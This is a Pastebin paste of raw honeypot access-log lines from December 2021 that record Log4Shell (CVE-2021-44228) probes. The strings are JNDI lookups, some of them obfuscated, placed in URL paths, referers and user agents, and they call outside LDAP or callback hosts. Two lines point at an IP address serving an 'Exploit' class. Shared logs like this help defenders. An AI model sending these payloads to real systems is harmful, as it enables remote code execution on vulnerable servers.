Advertisement
ILiedAboutCake

log4honeypot 1

Dec 12th, 2021
3,284
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 167.99.44.32 - - [11/Dec/2021:17:27:02 +0000] "GET / HTTP/1.1" 200 261887 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}"
  2. 167.99.44.32 - - [11/Dec/2021:19:04:40 +0000] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 200 411 "-" "Kryptos Logic Telltale"
  3. 167.99.44.32 - - [11/Dec/2021:23:27:54 +0000] "GET / HTTP/1.1" 200 103999 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
  4. 167.99.44.32 - - [12/Dec/2021:00:43:39 +0000] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 200 411 "-" "Kryptos Logic Telltale"
  5. 157.245.129.50 - - [12/Dec/2021:02:42:23 +0000] "GET / HTTP/1.1" 200 396495 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"
  6. 159.223.9.17 - - [12/Dec/2021:02:51:04 +0000] "GET / HTTP/1.1" 200 358847 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"
  7. 188.166.102.47 - - [12/Dec/2021:02:57:55 +0000] "GET / HTTP/1.1" 200 709263 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"
  8. 167.71.1.144 - - [12/Dec/2021:03:00:56 +0000] "GET / HTTP/1.1" 200 1459327 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"
  9. 167.71.1.144 - - [12/Dec/2021:03:02:52 +0000] "GET /favicon.ico HTTP/1.1" 404 134 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"
  10. 167.71.13.196 - - [12/Dec/2021:03:50:15 +0000] "GET /$%7Bjndi:ldaps://lx-ffff175c117cbb007271b5610000000038c2b5.probe001.log4j.leakix.net:443/b%7D?${jndi:ldaps://lx-ffff175c117cbb017271b5610000000022806c.probe001.log4j.leakix.net:443/b}=${jndi:ldaps://lx-ffff175c117cbb027271b5610000000070e561.probe001.log4j.leakix.net:443/b} HTTP/1.1" 200 24100612 "-" "${jndi:ldaps://lx-ffff175c117cbb087271b561000000007e3a76.probe001.log4j.leakix.net:443/b}"
  11. 61.19.25.207 - - [12/Dec/2021:08:28:09 +0000] "GET /$%7Bjndi:ldap://45.130.229.168:1389/Exploit%7D HTTP/1.1" 200 411 "-" "Mozilla/5.0 zgrab/0.x"
  12. 110.191.217.236 - - [12/Dec/2021:08:58:18 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qrj3e2v9thfo9ukphgcg45ukoyyyrjo.interact.sh/?Type=A HTTP/1.1" 200 908 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qrj3e2v9thfo9ukphgcg45ukoyyyrjo.interact.sh/?Type=A Type&Name=1100110&Char=!}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qrj3e2v9thfo9ukphgcg45ukoyyyrjo.interact.sh/?Type=A Type&Name=1100110&Char=!}"
  13. 110.191.217.236 - - [12/Dec/2021:08:58:19 +0000] "GET /?x=${jndi:ldap://${hostName}.c6qrj3e2v9thfo9ukphgcg45ukoyyyrmo.interact.sh/a} HTTP/1.1" 200 908 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qrj3e2v9thfo9ukphgcg45ukoyyyrmo.interact.sh}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qrj3e2v9thfo9ukphgcg45ukoyyyrmo.interact.sh}"
  14. 110.191.217.236 - - [12/Dec/2021:09:01:29 +0000] "GET /?x=${jndi:ldap://${hostName}.c6qrj3e2v9thfo9ukphgcg45w4eyyyc5w.interact.sh/a} HTTP/1.1" 200 908 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qrj3e2v9thfo9ukphgcg45w4eyyyc5w.interact.sh}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qrj3e2v9thfo9ukphgcg45w4eyyyc5w.interact.sh}"
  15. 110.191.217.236 - - [12/Dec/2021:09:01:32 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qrj3e2v9thfo9ukphgcg45w4ayyypb4.interact.sh/?Type=A HTTP/1.1" 200 908 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qrj3e2v9thfo9ukphgcg45w4ayyypb4.interact.sh/?Type=A Type&Name=1100110&Char=!}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qrj3e2v9thfo9ukphgcg45w4ayyypb4.interact.sh/?Type=A Type&Name=1100110&Char=!}"
  16. 110.191.217.236 - - [12/Dec/2021:09:01:36 +0000] "GET /?x=${jndi:ldap://${hostName}.c6qrj3e2v9thfo9ukphgcg45w5ayyypkc.interact.sh/a} HTTP/1.1" 200 908 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qrj3e2v9thfo9ukphgcg45w5ayyypkc.interact.sh}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qrj3e2v9thfo9ukphgcg45w5ayyypkc.interact.sh}"
  17. 110.191.217.236 - - [12/Dec/2021:09:01:37 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qrj3e2v9thfo9ukphgcg45whyyyyppc.interact.sh/?Type=A HTTP/1.1" 200 908 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qrj3e2v9thfo9ukphgcg45whyyyyppc.interact.sh/?Type=A Type&Name=1100110&Char=!}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qrj3e2v9thfo9ukphgcg45whyyyyppc.interact.sh/?Type=A Type&Name=1100110&Char=!}"
  18. 110.191.217.236 - - [12/Dec/2021:09:02:09 +0000] "GET /?x=${jndi:ldap://${hostName}.c6qrj3e2v9thfo9ukphgcg45ireyyyo8o.interact.sh/a} HTTP/1.1" 200 908 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qrj3e2v9thfo9ukphgcg45ireyyyo8o.interact.sh}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qrj3e2v9thfo9ukphgcg45ireyyyo8o.interact.sh}"
  19. 110.191.217.236 - - [12/Dec/2021:09:02:11 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qrj3e2v9thfo9ukphgcg45irayyyoqr.interact.sh/?Type=A HTTP/1.1" 200 908 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qrj3e2v9thfo9ukphgcg45irayyyoqr.interact.sh/?Type=A Type&Name=1100110&Char=!}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qrj3e2v9thfo9ukphgcg45irayyyoqr.interact.sh/?Type=A Type&Name=1100110&Char=!}"
  20. 159.89.85.91 - - [12/Dec/2021:10:03:33 +0000] "GET / HTTP/1.1" 200 392959 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
  21. 159.89.85.91 - - [12/Dec/2021:10:15:33 +0000] "GET /favicon.ico HTTP/1.1" 200 2866943 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
  22. 159.89.154.64 - - [12/Dec/2021:10:26:08 +0000] "GET / HTTP/1.1" 200 638719 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
  23. 159.89.154.64 - - [12/Dec/2021:10:35:06 +0000] "GET /favicon.ico HTTP/1.1" 200 4275967 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
  24. 67.205.170.85 - - [12/Dec/2021:10:44:38 +0000] "GET / HTTP/1.1" 200 392959 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
  25. 67.205.170.85 - - [12/Dec/2021:10:54:26 +0000] "GET /favicon.ico HTTP/1.1" 200 3096319 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
  26. 174.138.6.128 - - [12/Dec/2021:11:01:08 +0000] "GET / HTTP/1.1" 200 737023 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
  27. 174.138.6.128 - - [12/Dec/2021:11:03:29 +0000] "GET /favicon.ico HTTP/1.1" 200 6897407 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
  28. 67.205.170.85 - - [12/Dec/2021:12:04:07 +0000] "GET / HTTP/1.1" 200 524031 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
  29. 67.205.170.85 - - [12/Dec/2021:12:14:38 +0000] "GET /favicon.ico HTTP/1.1" 200 4472575 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
  30. 138.197.193.220 - - [12/Dec/2021:13:33:59 +0000] "GET / HTTP/1.1" 200 638719 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
  31. 20.71.156.146 - - [12/Dec/2021:14:22:33 +0000] "GET / HTTP/1.1" 200 95419 "-" "/${jndi:ldap://45.130.229.168:1389/Exploit}"
  32. 143.110.221.219 - - [12/Dec/2021:14:39:38 +0000] "GET / HTTP/1.1" 200 671487 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
  33. 143.110.221.219 - - [12/Dec/2021:14:42:45 +0000] "GET /favicon.ico HTTP/1.1" 200 4423423 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
  34. 147.182.154.110 - - [12/Dec/2021:15:08:04 +0000] "GET / HTTP/1.1" 200 687871 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
  35. 147.182.169.254 - - [12/Dec/2021:15:11:14 +0000] "GET / HTTP/1.1" 200 671487 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
  36. 147.182.154.110 - - [12/Dec/2021:15:11:57 +0000] "GET /favicon.ico HTTP/1.1" 200 2801407 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
  37. 147.182.169.254 - - [12/Dec/2021:15:14:55 +0000] "GET /favicon.ico HTTP/1.1" 200 5979903 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
Advertisement
RAW Paste Data Copied
Advertisement